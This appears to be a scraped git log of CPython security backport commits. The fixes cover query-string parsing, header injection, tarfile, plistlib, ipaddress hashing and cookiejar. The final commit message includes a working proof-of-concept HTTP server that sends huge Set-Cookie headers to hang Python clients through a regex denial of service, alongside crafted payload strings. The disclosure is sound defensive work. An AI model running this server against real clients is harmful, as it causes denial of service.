| Commit message (Collapse) | Author | Age | Files | Lines |
| |
|
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
bpo-42967: [security] Address a web cache-poisoning issue reported in
urllib.parse.parse_qsl().
urllib.parse will only us "&" as query string separator by default
instead of both ";" and "&" as allowed in earlier versions. An optional
argument seperator with default value "&" is added to specify the
separator.
Co-authored-by: Éric Araujo <merwok@netwok.org>
Co-authored-by: Ken Jin <28750310+Fidget-Spinner@users.noreply.github.com>
Co-authored-by: Adam Goldschmidt <adamgold7@gmail.com>
|
|
|
|
|
|
|
| |
ctypes param reprs. (GH-24250)
(cherry picked from commit 916610ef90a0d0761f08747f7b0905541f0977c7)
Co-authored-by: Benjamin Peterson <benjamin@python.org>
|
|
|
|
|
| |
(cherry picked from commit de6f20a6de48d63066b2cf5b317f50629f01d74a)
Co-authored-by: Dong-hee Na <donghee.na@python.org>
|
|
|
|
|
|
|
| |
(GH-24037) (GH-24042)
(cherry picked from commit ec3165320e81ac87edcb85c86c452528ddbaec1c)
Co-authored-by: Dong-hee Na <donghee.na@python.org>
|
|
|
|
|
|
|
|
|
| |
The existing volatile `left`/`right` pointers guarantee that the reads will all occur, but does not guarantee that they will be _used_. So a compiler can still short-circuit the loop, saving e.g. the overhead of doing the xors and especially the overhead of the data dependency between `result` and the reads. That would change performance depending on where the first unequal byte occurs. This change removes that optimization.
(This is change GH-1 from https://bugs.python.org/issue40791 .)
(cherry picked from commit 31729366e2bc09632e78f3896dbce0ae64914f28)
Co-authored-by: Devin Jeanpierre <jeanpierreda@google.com>
|
|
|
|
|
|
|
|
|
| |
Fix an assertion error in format() in debug build for floating point
formatting with "n" format, zero padding and small width. Release build is
not impacted. Patch by Karthikeyan Singaravelan.
(cherry picked from commit 3f7983a25a3d19779283c707fbdd5bc91b1587ef)
Co-authored-by: Xtreak <tir.karthi@gmail.com>
|
|
|
|
|
|
|
|
|
|
|
| |
* Prevent some possible DoS attacks via providing invalid Plist files
with extremely large number of objects or collection sizes.
* Raise InvalidFileException for too large bytes and string size instead of returning garbage.
* Raise InvalidFileException instead of ValueError for specific invalid datetime (NaN).
* Raise InvalidFileException instead of TypeError for non-hashable dict keys.
* Add more tests for invalid Plist files..
(cherry picked from commit 34637a0ce21e7261b952fbd9d006474cc29b681f)
Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
|
|
|
| |
(cherry picked from commit 283f9a253b4ff4df728558205629b3bb3af6e47f)
|
|
|
|
|
|
|
| |
codec tests (GH-22566) (GH-22579)
(cherry picked from commit 2ef5caa58febc8968e670e39e3d37cf8eef3cab8)
Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
|
|
|
|
|
|
|
|
|
| |
(GH-22801) (GH-22804)
Co-authored-by: Ronald Oussoren <ronaldoussoren@mac.com>
(cherry picked from commit e512bc799e3864fe3b1351757261762d63471efc)
Co-authored-by: Ned Deily <nad@python.org>
|
| |
|
| |
|
| |
|
|
|
|
|
|
| |
reject control chars in http method in http.client.putrequest to prevent http header injection
(cherry picked from commit 8ca8a2e8fb068863c1138f07e3098478ef8be12e)
Co-authored-by: AMIR <31338382+amiremohamadi@users.noreply.github.com>
|
|
|
|
|
|
|
| |
Avoid infinite loop when reading specially crafted TAR files using the tarfile module
(CVE-2019-20907).
(cherry picked from commit 5a8d121a1f3ef5ad7c105ee378cc79a3eac0c7d4)
Co-authored-by: Rishi <rishi_devan@mail.com>
|
|
|
|
|
|
| |
Automerge-Triggered-By: @tiran
(cherry picked from commit 4f309abf55f0e6f8950ac13d6ec83c22b8d47bf8)
Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
|
|
|
|
|
|
|
|
|
|
|
| |
Python is embedded (GH-21298) (#21354)
* bpo-29778: Ensure python3.dll is loaded from correct locations when Python is embedded (GH-21298)
* bpo-29778: Ensure python3.dll is loaded from correct locations when Python is embedded.
* Add CVE number
* Updates for 3.6
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
(GH-21033) (GH-21232)
CVE-2020-14422
The __hash__() methods of classes IPv4Interface and IPv6Interface had issue
of generating constant hash values of 32 and 128 respectively causing hash collisions.
The fix uses the hash() function to generate hash values for the objects
instead of XOR operation
(cherry picked from commit b30ee26e366bf509b7538d79bfec6c6d38d53f28)
Co-authored-by: Ravi Teja P <rvteja92@gmail.com>
Signed-off-by: Tapas Kundu <tkundu@vmware.com>
|
| |
|
| |
|
| |
|
| |
|
|
|
|
|
|
|
|
| |
Disallow CR or LF in email.headerregistry.Address arguments to guard against header injection attacks.
(cherry picked from commit 614f17211c5fc0e5b828be1d3320661d1038fe8f)
Co-authored-by: Ashwin Ramaswami <aramaswamis@gmail.com>
Co-authored-by: Ashwin Ramaswami <aramaswamis@gmail.com>
|
| |
|
|
|
|
|
|
|
| |
(cherry picked from commit 19e3e0026417caa92ffe21a67157363b45da9aa2)
Co-authored-by: Julien Palard <julien@palard.fr>
Co-authored-by: Julien Palard <julien@palard.fr>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
The AbstractBasicAuthHandler class of the urllib.request module uses
an inefficient regular expression which can be exploited by an
attacker to cause a denial of service. Fix the regex to prevent the
catastrophic backtracking. Vulnerability reported by Ben Caller
and Matt Schwager.
AbstractBasicAuthHandler of urllib.request now parses all
WWW-Authenticate HTTP headers and accepts multiple challenges per
header: use the realm of the first Basic challenge.
Co-Authored-By: Serhiy Storchaka <storchaka@gmail.com>
(cherry picked from commit 0b297d4ff1c0e4480ad33acae793fbaf4bf015b4)
|
|
|
| |
Disable "Codevov patch" job on pull requests.
|
|
|
|
|
|
|
|
| |
(GH-18995) (GH-19002)
Add host validation for control characters for more CVE-2019-18348 protection.
(cherry picked from commit 9165addc22d05e776a54319a8531ebd0b2fe01ef)
Co-authored-by: Ashwin Ramaswami <aramaswamis@gmail.com>
|
|
|
|
|
|
| |
(cherry picked from commit e5e56328afac50aad6d8893185d8e7ba8928afe2)
Co-authored-by: Antoine <43954001+awecx@users.noreply.github.com>
|
|
|
|
| |
(GH-18459)
|
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
When called on a closed object, readinto() segfaults on account
of a write to a freed buffer:
==220553== Process terminating with default action of signal 11 (SIGSEGV): dumping core
==220553== Access not within mapped region at address 0x2A
==220553== at 0x48408A0: memmove (vg_replace_strmem.c:1272)
==220553== by 0x58DB0C: _buffered_readinto_generic (bufferedio.c:972)
==220553== by 0x58DCBA: _io__Buffered_readinto_impl (bufferedio.c:1053)
==220553== by 0x58DCBA: _io__Buffered_readinto (bufferedio.c.h:253)
Reproducer:
reader = open ("/dev/zero", "rb")
_void = reader.read (42)
reader.close ()
reader.readinto (bytearray (42)) GH-GH-GH- BANG!
The problem exists since 2012 when commit dc469454ec added code
to free the read buffer on close().
Signed-off-by: Philipp Gesang <philipp.gesang@intra2net.com>
(cherry picked from commit cb1c0746f277052e45a60d6c436a765e34722821)
Co-authored-by: Philipp Gesang <phg@phi-gamma.net>
Co-authored-by: Philipp Gesang <phg@phi-gamma.net>
|
|
|
|
|
|
| |
(GH-18233)
|
|
|
|
|
|
|
|
| |
(GH-18118) (GH-18146)
(cherry picked from commit 79f89e6e5a659846d1068e8b1bd8e491ccdef861)
Co-authored-by: Pablo Galindo <Pablogsal@gmail.com>
|
|
|
|
|
|
| |
(cherry picked from commit f4800b8ed3dbe15a0078869a836d968ab3362b8c)
Co-authored-by: Inada Naoki <songofacandy@gmail.com>
|
| |
|
|
|
|
|
| |
(cherry picked from commit 946b29ea0b3b386ed05e87e60b8617c9dc19cd53)
Co-authored-by: Benjamin Peterson <benjamin@python.org>
|
| |
|
| |
|
|
|
|
|
|
|
| |
Catalina (GH-17636) (GH-17638)
(cherry picked from commit bf3aa1060a29a05813abbe877193af16e3e7131e)
Co-authored-by: Ned Deily <nad@python.org>
|
| |
|
|
|
|
|
|
|
| |
*reuse_address* parameter (GH-17595). (GH-17632)
(cherry picked from commit f501db2b93a9d3d840b6fb38d6bdda8bcc400d4a)
Co-authored-by: Kyle Stanley <aeros167@gmail.com>
|
|
|
|
|
|
| |
Co-authored-by: tirkarthi
(cherry picked from commit 1988344a6bff253f017e053f69318ecf03587294)
Co-authored-by: Kyle Stanley <aeros167@gmail.com>
|
| |
|
| |
|
|
|
|
|
|
|
|
| |
(GH-17311). (GH-17571)
(cherry picked from commit ab513a38c98695f271e448fe2cb7c5e39eeaaaaf)
Co-authored-by: Kyle Stanley <aeros167@gmail.com>
|
|
|
|
|
|
|
| |
format (GH-17418) (GH-17444)
(cherry picked from commit a62ad4730c9b575f140f24074656c0257c86a09a)
Co-authored-by: Matthew Rollings <1211162+stealthcopter@users.noreply.github.com>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.
The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to
\d+-\w+-\d+(\s*\s*\s*)$
Therefore, a long sequence of spaces can trigger bad performance.
Matching a malicious string such as
LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")
caused catastrophic backtracking.
The fix removes ambiguity about which \s* should match a particular
space.
You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.
from http.server import BaseHTTPRequestHandler, HTTPServer
def make_set_cookie_value(n_spaces):
spaces = " " * n_spaces
expiry = f"1-c-1{spaces}!"
return f"b;Expires={expiry}"
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
self.log_request(204)
self.send_response_only(204) GH- Don't bother sending Server and Date
n_spaces = (
int(self.path[1:]) GH- Can GET e.g. /100 to test shorter sequences
if len(self.path) > 1 else
65506 GH- Max header line length 65536
)
value = make_set_cookie_value(n_spaces)
for i in range(99): GH- Not necessary, but we can have up to 100 header lines
self.send_header("Set-Cookie", value)
self.end_headers()
if __name__ == "__main__":
HTTPServer(("", 44020), Handler).serve_forever()
This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.
Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :
import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")
The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):
import requests
requests.get("http://localhost:44020/")
* Regression test for http.cookiejar REDoS
If we regress, this test will take a very long time.
* Improve performance of http.cookiejar.ISO_DATE_RE
A string like
"444444" + (" " * 2000) + "A"
could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bfb8593739b11cbb988ef82a883ec9d077e)
Co-authored-by: bcaller <bcaller@users.noreply.github.com>
|